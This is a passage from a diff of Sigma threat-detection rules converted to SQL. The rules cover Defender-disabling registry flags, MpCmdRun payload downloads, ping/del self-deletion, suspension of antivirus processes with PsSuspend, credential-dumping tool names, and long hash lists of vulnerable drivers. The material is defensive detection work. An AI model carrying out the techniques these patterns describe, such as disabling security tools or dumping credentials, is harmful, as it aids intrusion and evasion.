'%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE 
'%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" ], - "filename": "driver_load_win_windivert.yml" + "filename": "proc_creation_win_reg_disable_sec_services.yml" }, { - "title": "Vulnerable AVAST Anti Rootkit Driver Load", - "id": "7c676970-af4f-43c8-80af-ec9b49952852", - "status": "experimental", - "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Defender Download Activity", + "id": "46123129-1024-423e-9fae-43af4a0fa9a5", + "status": "test", + "description": "Detect the use of Windows Defender to download payloads", + "author": "Matthew Matchen", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE 
'\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" + "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" }, { - "title": "Vulnerable Dell BIOS Update Driver Load", - "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", + "title": "Suspicious Ping/Del Command Combination", + "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", "status": "experimental", - "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. 
Its used to hide the file responsible for the initial infection for example", + "author": "Ilya Krestinichev", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543", - "attack.t1068" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" ], - "filename": "driver_load_win_vuln_dell_driver.yml" + "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" }, { - "title": "Credential Dumping Tools Service Execution", - "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", - "status": "test", 
- "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Sysinternals PsSuspend Suspicious Execution", + "id": "4beb6ae0-f85b-41e2-8f18-8668abc8af78", + "status": "experimental", + "description": "Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'pssuspend.exe' OR (NewProcessName LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend64.exe' ESCAPE '\\')) AND CommandLine LIKE '%msmpeng.exe%' ESCAPE '\\')" ], - "filename": "driver_load_win_mal_creddumper.yml" + "filename": "proc_creation_win_sysinternals_pssuspend_susp_execution.yml" }, { - "title": "Vulnerable Driver Load", - "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "title": "Parent in Public Folder Suspicious Process", + "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", "status": "experimental", - "description": "Detects the 
load of known vulnerable drivers by hash value", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1068" - ], + "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA1=2261198385d62d2117f50f631652eded0ecc71db%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8db869c0674221a2d3280143cbb0807fac08e0cc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27d3ebea7655a72e6e8b95053753a25db944ec0f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=33cdab3bbc8b3adce4067a1b042778607dce2acd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=21e6c104fe9731c874fab5c9560c929b2857b918%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d979353d04bf65cc92ad3412605bc81edbb75ec2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2f991435a6f58e25c103a657d24ed892b99690b8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f02af84393e9627ba808d4159841854a6601cf80%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bb962c9a8dda93e94fef504c4159de881e4706fe%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b97a8d506be2e7eaa4385f70c009b22adbd071ba%' ESCAPE '\\' OR Hashes LIKE '%SHA1=92f251358b3fe86fd5e7aa9b17330afa0d64a705%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8b6aa5b2bff44766ef7afbe095966a71bc4183fa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=af6e1f2cfb230907476e8b2d676129b6d6657124%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fcde5275ee1913509927ce5f0f85e6681064c9d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=00a442a4305c62cefa8105c0b4c4a9a5f4d1e93b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6523b3fd87de39eb5db1332e4523ce99556077dc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=72966ca845759d239d09da0de7eebe3abe86fee3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=57511ef5ff8162a9d793071b5bf7ebe8371759de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2d503a2457a787014a1fdd48a2ece2e6cbe98ea7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=400f833dcc2ef0a122dd0e0b1ec4ec929340d90e%' ESCAPE '\\' OR Hashes 
LIKE '%SHA1=89cd760e8cb19d29ee08c430fb17a5fd4455c741%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1d0df45ee3fa758f0470e055915004e6eae54c95%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d5fd9fe10405c4f90235e583526164cd0902ed86%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c52cef5b9e1d4a78431b7af56a6fdb6aa1bcad65%' ESCAPE '\\' OR Hashes LIKE '%SHA1=609fa1efcf61e26d64a5ceb13b044175ab2b3a13%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7d7c03e22049a725ace2a9812c72b53a66c2548b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f9519d033d75e1ab6b82b2e156eafe9607edbcfb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=468e2e5505a3d924b14fedee4ddf240d09393776%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e3de9bff43d7712707ef8a0b10f7e4ad8427fd8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c9cbfdd0be7b35751a017ec59ff7237ffdc4df1f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=078ae07dec258db4376d5a2a05b9b508d68c0123%' ESCAPE '\\' OR Hashes LIKE '%SHA1=623cd2abef6c92255f79cbbd3309cb59176771da%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1f3a9265963b660392c4053329eb9436deeed339%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4a235f0b84ff615e2879fa9e0ec0d745fcfdaa5c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ace6b9e34e3e2e73fe584f3bbdb4e4ec106e0a7d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4268f30b79ce125a81d0d588bef0d4e2ad409bbb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c834c4931b074665d56ccab437dfcc326649d612%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8f5cd4a56e6e15935491aa40adb1ecad61eafe7c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=51b60eaa228458dee605430aae1bc26f3fc62325%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3270720a066492b046d7180ca6e60602c764cac7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2a6e6bd51c7062ad24c02a4d2c1b5e948908d131%' ESCAPE '\\' OR Hashes LIKE '%SHA1=19bd488fe54b011f387e8c5d202a70019a204adf%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a6fe4f30ca7cb94d74bc6d42cdd09a136056952e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ea877092d57373cb466b44e7dbcad4ce9a547344%' ESCAPE '\\' OR Hashes LIKE '%SHA1=205c69f078a563f54f4c0da2d02a25e284370251%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f9feb60b23ca69072ce42264cd821fe588a186a6%' ESCAPE '\\' OR 
Hashes LIKE '%SHA1=b25170e09c9fb7c0599bfba3cf617187f6a733ac%' ESCAPE '\\' OR Hashes LIKE '%SHA1=160c96b5e5db8c96b821895582b501e3c2d5d6e7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a2e0b3162cfa336cd4ab40a2acc95abe7dc53843%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4e826430a1389032f3fe06e2cc292f643fb0c417%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7ab4565ba24268f0adadb03a5506d4eb1dc7c181%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dc7b022f8bd149efbcb2204a48dce75c72633526%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0307d76750dd98d707c699aee3b626643afb6936%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5711c88e9e64e45b8fc4b90ab6f2dd6437dc5a8a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6714380bc0b8ab09b9a0d2fa66d1b025b646b946%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8626ab1da6bfbdf61bd327eb944b39fd9df33d1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=30a224b22592d952fbe2e6ad97eda4a8f2c734e0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c95db1e82619fb16f8eec9a8209b7b0e853a4ebe%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fe1d909ab38de1389a2a48352fd1c8415fd2eab0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b4d1554ec19504215d27de0758e13c35ddd6db3e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5dd2c31c4357a8b76db095364952b3d0e3935e1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ecb4d096a9c58643b02f328d2c7742a38e017cf0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4a705af959af61bad48ef7579f839cb5ebd654d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d2e6fc9259420f0c9b6b1769be3b1f63eb36dc57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c948ae14761095e4d76b55d9de86412258be7afd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ddbe809b731a0962e404a045ab9e65a0b64917ad%' ESCAPE '\\' OR Hashes LIKE '%SHA1=745bad097052134548fe159f158c04be5616afc2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8d59fd14a445c8f3f0f7991fa6cd717d466b3754%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2dfcb799b3c42ecb0472e27c19b24ac7532775ce%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc51be79ae56bc97211f6b73cc905c3492da8f9d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ac13941f436139b909d105ad55637e1308f49d9a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2b0bb408ff0e66bcdf6574f1ca52cbf4015b257b%' ESCAPE '\\' 
OR Hashes LIKE '%SHA1=cc0e0440adc058615e31e8a52372abadf658e6b1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5520ac25d81550a255dc16a0bb89d4b275f6f809%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6afc6b04cf73dd461e4a4956365f25c1f1162387%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4b009e91bae8d27b160dc195f10c095f8a2441e1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6003184788cd3d2fc624ca801df291ccc4e225ee%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0466e90bf0e83b776ca8716e01d35a8a2e5f96d3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e6305dddd06490d7f87e3b06d09e9d4c1c643af0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=89909fa481ff67d7449ee90d24c167b17b0612f1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d7e8aef8c8feb87ce722c0b9abf34a7e6bab6eb4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5e6ddd2b39a3de0016385cbd7aa50e49451e376d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=976777d39d73034df6b113dfce1aa6e1d00ffcfd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c6749fc6c1127f8788bff70e0ce9062959637c9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53acd4d9e7ba0b1056cf52af0d191f226eddf312%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3abb9d0a9d600200ae19c706e570465ef0a15643%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27eab595ec403580236e04101172247c4f5d5426%' ESCAPE '\\' OR Hashes LIKE '%SHA1=78b9481607ca6f3a80b4515c432ddfe6550b18a8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=414cd15d6c991d19fb5be02e3b9fb0e6c5ce731c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d9c09dd725bc7bc3c19b4db37866015817a516ef%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c256edd10823ca76c0443a330e523027b70522d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=35829e096a15e559fcbabf3441d99e580ca3b26e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b8de3a1aeeda9deea43e3f768071125851c85bd0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=054a50293c7b4eea064c91ef59cf120d8100f237%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d94f2fb3198e14bfe69b44fb9f00f2551f7248b2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=01a578a3a39697c4de8e3dab04dba55a4c35163e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=14bf0eaa90e012169745b3e30c281a327751e316%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f50c6b84dfb8f2d53ba3bce000a55f0a486c0e79%' ESCAPE 
'\\' OR Hashes LIKE '%SHA1=6100eb82a25d64a7a7702e94c2b21333bc15bd08%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bf87e32a651bdfd9b9244a8cf24fca0e459eb614%' ESCAPE '\\' OR Hashes LIKE '%SHA1=28b1c0b91eb6afd2d26b239c9f93beb053867a1a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=879fcc6795cebe67718388228e715c470de87dca%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1f7501e01d84a2297c85cb39880ec4e40ac3fe8a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=152b6bb9ffd2ffec00cc46f5c6e29362d0e66e67%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5f8356ffa8201f338dd2ea979eb47881a6db9f03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a7bd05de737f8ea57857f1e0845a25677df01872%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cce9b82f01ec68f450f5fe4312f40d929c6a506e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e35a2b009d54e1a0b231d8a276251f64231b66a3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=37364cb5f5cefd68e5eca56f95c0ab4aff43afcc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d62fa51e520022483bdc5847141658de689c0c29%' ESCAPE '\\' OR Hashes LIKE '%SHA1=93aa3bb934b74160446df3a47fa085fd7f3a6be9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ec4cc6de4c779bb1ca1dd32ee3a03f7e8d633a9b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=35f1ba60ba0da8512a0b1b15ee8e30fe240d77cd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3805e4e08ad342d224973ecdade8b00c40ed31be%' ESCAPE '\\' OR Hashes LIKE '%SHA1=65d8a7c2e867b22d1c14592b020c548dd0665646%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c8d87f3cd34c572870e63a696cf771580e6ea81b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c4d7fb9db3c3459f7e8c0e3d48c95c7c9c4cff60%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d34a7c497c603f3f7fcad546dc4097c2da17c430%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1fd7f881ea4a1dbb5c9aeb9e7ad659a85421745b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0b8b83f245d94107cb802a285e6529161d9a834d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c969f1f73922fd95db1992a5b552fbc488366a40%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ac600a2bc06b312d92e649b7b55e3e91e9d63451%' ESCAPE '\\' OR Hashes LIKE '%SHA1=da9cea92f996f938f699902482ac5313d5e8b28e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=33285b2e97a0aeb317166cce91f6733cf9c1ad53%' 
ESCAPE '\\' OR Hashes LIKE '%SHA1=21edff2937eb5cd6f6b0acb7ee5247681f624260%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f052dc35b74a1a6246842fbb35eb481577537826%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f0c463d29a5914b01e4607889094f1b7d95e7aaf%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0c26ab1299adcd9a385b541ef1653728270aa23e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f36a47edfacd85e0c6d4d22133dd386aee4eec15%' ESCAPE '\\' OR Hashes LIKE '%SHA1=460008b1ffd31792a6deadfa6280fb2a30c8a5d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=738b7918d85e5cb4395df9e3f6fc94ddad90e939%' ESCAPE '\\' OR Hashes LIKE '%SHA1=43419df1f9a07430a18c5f3b3cc74de621be0f8e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=558aad879b6a47d94a968f39d0a4e3a3aaef1ef1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7fb52290883a6b69a96d480f2867643396727e83%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f5696fb352a3fbd14fb1a89ad21a71776027f9ab%' ESCAPE '\\' OR Hashes LIKE '%SHA1=693a2645c28fc3b248fda95179c36c3ac64f6fc2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=05c0c49e8bcf11b883d41441ce87a2ee7a3aba1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d25340ae8e92a6d29f599fef426a2bc1b5217299%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7c1b25518dee1e30b5a6eaa1ea8e4a3780c24d0c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fe10018af723986db50701c8532df5ed98b17c39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bfe55cacc7c56c9f7bd75bdb4b352c0b745d071b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a21c84c6bf2e21d69fa06daaf19b4cc34b589347%' ESCAPE '\\' OR Hashes LIKE '%SHA1=82ba5513c33e056c3f54152c8555abf555f3e745%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d098600152e5ee6a8238d414d2a77a34da8afaaa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=64e4ac8b9ea2f050933b7ec76a55dd04e97773b4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bbc1e5fd826961d93b76abd161314cb3592c4436%' ESCAPE '\\' OR Hashes LIKE '%SHA1=90a76945fd2fa45fab2b7bcfdaf6563595f94891%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b03b1996a40bfea72e4584b82f6b845c503a9748%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c771ea59f075170e952c393cfd6fc784b265027c%' ESCAPE '\\' OR Hashes LIKE 
'%SHA1=cb44c6f0ee51cb4c5836499bc61dd6c1fbdf8aa1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0918277fcdc64a9dc51c04324377b3468fa1269b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b09bcc042d60d2f4c0d08284818ed198cededa04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8dc2097a90eb7e9d6ee31a7c7a95e7a0b2093b89%' ESCAPE '\\' OR Hashes LIKE '%SHA1=15df139494d2c40a645fb010908551185c27f3c5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=012db3a80faf1f7f727b538cbe5d94064e7159de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d04e5db5b6c848a29732bfd52029001f23c3da75%' ESCAPE '\\' OR Hashes LIKE '%SHA1=490109fa6739f114651f4199196c5121d1c6bdf2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b4d014b5edd6e19ce0e8395a64faedf49688ecb5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a87d6eac2d70a3fbc04e59412326b28001c179de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3f223581409492172a1e875f130f3485b90fbe5f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5db61d00a001fd493591dc919f69b14713889fc5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9923c8f1e565a05b3c738d283cf5c0ed61a0b90f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=15d1a6a904c8409fb47a82aefa42f8c3c7d8c370%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9d07df024ec457168bf0be7e0009619f6ac4f13c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9a35ae9a1f95ce4be64adc604c80079173e4a676%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6bd965300f07012d1b651a9b8776028c45b149a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e83458c4a6383223759cd8024e60c17be4e7c85f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cb3de54667548a5c9abf5d8fa47db4097fcee9f1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c24dd75e4074041dbe03bf21f050c77d748b8e9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dc55217b6043d819eadebd423ff07704ee103231%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e92817a8744ebc4e4fa5383cdce2b2977f01ecd4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dc0e97adb756c0f30b41840a59b85218cbdd198f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=26c4a7b392d7e7bd7f0a2a758534e45c0d9a56ab%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d0d39e1061f30946141b6ecfa0957f8cc3ddeb63%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6d349823bbb1f5b44bae91357895dba653c5861%' ESCAPE '\\' OR Hashes 
LIKE '%SHA1=f42f28d164205d9f6dab9317c9fecad54c38d5d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bbc0b9fd67c8f4cefa3d76fcb29ff3cef996b825%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8183a341ba6c3ce1948bf9be49ab5320e0ee324d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=eb1ecad3d37bb980f908bf1a912415cff32e79e6%' ESCAPE '\\' OR Hashes LIKE '%SHA1=eb0d45aa6f537f5b2f90f3ad99013606eafcd162%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6053d258096bccb07cb0057d700fe05233ab1fbb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=29a190727140f40cea9514a6420f5a195e36386b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a4b2c56c12799855162ca3b004b4b2078c6ecf77%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7667b72471689151e176baeba4e1cd9cd006a09a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d7f7594ff084201c0d9fa2f4ef1626635b67bce5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=99201c9555e5faf6e8d82da793b148311f8aa4b8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=947db58d6f36a8df9fa2a1057f3a7f653ccbc42e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6a3d3b9ab3d201cd6b0316a7f9c3fb4d34d0f403%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d702d88b12233be9413446c445f22fda4a92a1d9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=910cb12aa49e9f35ecc4907e8304adf0dcca8cf1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=643383938d5e0d4fd30d302af3e9293a4798e392%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c4ed28fdfba7b8a8dfe39e591006f25d39990f07%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b0032b8d8e6f4bd19a31619ce38d8e010f29a816%' ESCAPE '\\' OR Hashes LIKE '%SHA1=db6245578ec57bd767b27ecf8085095e1c8e5a6e%' ESCAPE '\\' 